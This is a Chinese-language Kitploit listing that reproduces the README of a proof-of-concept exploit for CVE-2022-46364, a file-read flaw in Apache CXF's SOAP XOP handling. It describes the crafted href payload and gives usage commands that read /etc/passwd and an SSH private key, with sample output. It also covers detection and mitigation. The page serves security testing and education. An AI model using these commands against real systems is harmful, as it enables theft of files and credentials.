Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-46364---Apache-CXF-XOP-Include-LFI-PoC — CVE-2022-46364的概念验证利用,Apache CXF中通过SOAP请求中精心构造的XOP Include元素实现本地文件包含漏洞,允许任意文件读取。 | Kitploit
工具/GitHubGitHub/shashivanth009/cve-2022-46364---apache-cxf-xop-include-lfi-poc
漏洞分析漏洞利用Web应用程序漏洞利用CTF渗透测试学习与教育
GitHubshashivanth009/cve-2022-46364---apache-cxf-xop-include-lfi-poc

CVE-2022-46364---Apache-CXF-XOP-Include-LFI-PoC

CVE-2022-46364的概念验证利用,Apache CXF中通过SOAP请求中精心构造的XOP Include元素实现本地文件包含漏洞,允许任意文件读取。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
125个月前尚未审核
分享

Apache CXF XOP Include 本地文件包含 (CVE-2022-46364)

概述

本仓库包含针对 CVE-2022-46364 的概念验证 (PoC) 利用程序,这是 Apache CXF 中的一个本地文件包含 (LFI) 漏洞。

该漏洞是由于 SOAP 请求中 XOP(XML 二进制优化打包)Include 元素处理不当引起的,允许攻击者读取服务器上的任意文件。


漏洞详情

  • CVE ID: CVE-2022-46364
  • 组件: Apache CXF
  • 漏洞类型: 本地文件包含 (LFI)
  • 攻击向量: 远程(某些情况下无需认证)
  • 影响: 服务器任意文件读取

根本原因

Apache CXF 不正确处理 SOAP 请求中的 <xop:Include> 元素。通过提供特制的 href(例如 file:///etc/passwd),服务器可能包含并返回本地文件内容。


受影响版本

  • Apache CXF 版本 在补丁版本之前(根据分支为 3.4.x / 3.5.x)

请始终确认目标环境中的确切受影响版本。


利用流程

  1. 攻击者发送特制的 SOAP 请求
  2. 包含 <xop:Include href="file:///path/to/file">
  3. 服务器处理请求并读取本地文件
  4. 文件内容在 SOAP 响应中返回

仓库结构

root@kitploit:~
.
├── cxf_lfi.sh       # Exploit script
├── README.md        # Documentation
├── LICENSE          # MIT License
└── .gitignore

需求

  • Bash
  • curl
  • base64(可选,用于解码输出)

使用方法

1. 使脚本可执行

root@kitploit:~
chmod +x cxf_lfi.sh

2. 编辑目标 URL

更新脚本中的目标:

root@kitploit:~
TARGET="http://<TARGET_IP>:8080/employeeservice"

3. 运行利用程序

root@kitploit:~
./cxf_lfi.sh file:///etc/passwd

攻击示例

示例 1:读取系统用户

root@kitploit:~
./cxf_lfi.sh file:///etc/passwd

示例 2:读取应用程序密钥

root@kitploit:~
./cxf_lfi.sh file:///home/user/.ssh/id_rsa

示例输出

root@kitploit:~
[+] Target: http://10.10.10.10:8080/employeeservice
[+] File: file:///etc/passwd
[+] Extracted Content:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

注意事项与限制

  • 某些服务器可能:
    • 返回 base64 编码的内容
    • 通过权限限制文件访问
    • 清洗或屏蔽 file:// 协议
  • 输出解析取决于响应格式,可能需要手动检查。

检测与缓解

检测

监控包含以下内容的异常 SOAP 请求:

  • <xop:Include>
  • file:// URIs

缓解措施

  • 将 Apache CXF 升级到已修补版本
  • 如果不需要,禁用或限制 XOP 处理
  • 验证并清洗传入的 SOAP 负载

道德使用声明

本项目仅供:

  • 教育目的
  • 授权的渗透测试

切勿在未经明确许可的系统上使用此工具。


参考

  • Apache CXF 安全公告
  • CVE 数据库 (CVE-2022-46364)

作者

作为安全研究和 CTF 实践的一部分开发。

下载工具